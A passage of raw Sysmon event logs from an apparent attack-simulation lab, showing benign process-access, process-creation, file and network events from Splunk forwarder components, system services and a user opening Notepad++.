07:47:27.472{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806705Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:27.472{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F38F-60EB-5579-00000000D001}2564C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806704Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:27.472{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806703Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:27.472{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F38F-60EB-5579-00000000D001}2564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806702Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:27.442{0C1E0330-F38F-60EB-5579-00000000D001}2564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806701Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:27.440{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4FAC2D3FFE40B15414FB1703ED5B5B7,SHA256=D8B22EBD165368CD13593596DD438096339763FA667941DA7E9AE2BA7BFC4F2E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806731Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:27.260{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 
AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57202-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806730Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:28.690{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57D0D76B04628D4539434989E6A811FE,SHA256=25CFA8CE3FAEB2F3538CB54029CD23405FB2AF9C650A2F2C3B1DBD848075B50B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806729Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:28.081{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F390-60EB-5679-00000000D001}2324C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806728Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:47:28.081{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806727Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:28.081{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806726Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:47:28.081{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806725Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:28.081{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806724Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:47:28.081{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806723Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:28.081{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806722Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:47:28.081{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806721Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:28.081{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806720Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:47:28.081{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806719Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:28.081{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F390-60EB-5679-00000000D001}2324C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806718Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:28.065{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F390-60EB-5679-00000000D001}2324C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806717Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:28.066{0C1E0330-F390-60EB-5679-00000000D001}2324C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806733Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:29.690{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1164DBB22CE20BCA636F9462FFD04D1F,SHA256=64FD577680A03B24774C17E3D6A85BEDB407D85EFF218FF9772847E926B80FDE,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001046991Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:29.933{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\session.xmlMD5=70940ACC8AF473C36CCE561AB6B8222C,SHA256=B8BFE97824AD60A72BCC1579FB194FE67E572ED2D8A12B09B3A44DFA0418B5C8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046990Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:20.802{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50954-false10.0.1.12-8000- 23542300x80000000000000001046989Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:29.002{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=668121370F370E8537F8AB6D446AB467,SHA256=CCE792C42149D6EFB12492AF963E8A3A23D74BBB6242D74C34C26DC3B952E0ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806732Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:29.159{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=26412297ABD323C8E5A5EF0C9E0A467F,SHA256=26AEFDC4F88C87DC218FECD61C37E022D901DD0F5BFC81AB4452FE527BCD4DDA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806735Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:30.706{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83A260EEDEA1D20E30016C2729C0FBB2,SHA256=A8B41A7A6F5F2F22A754969569C86E0096BEF2F672FD20921CC2D85FD4601438,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047047Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.885{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001047046Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.885{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001047045Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.885{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 
10341000x80000000000000001047044Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.885{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 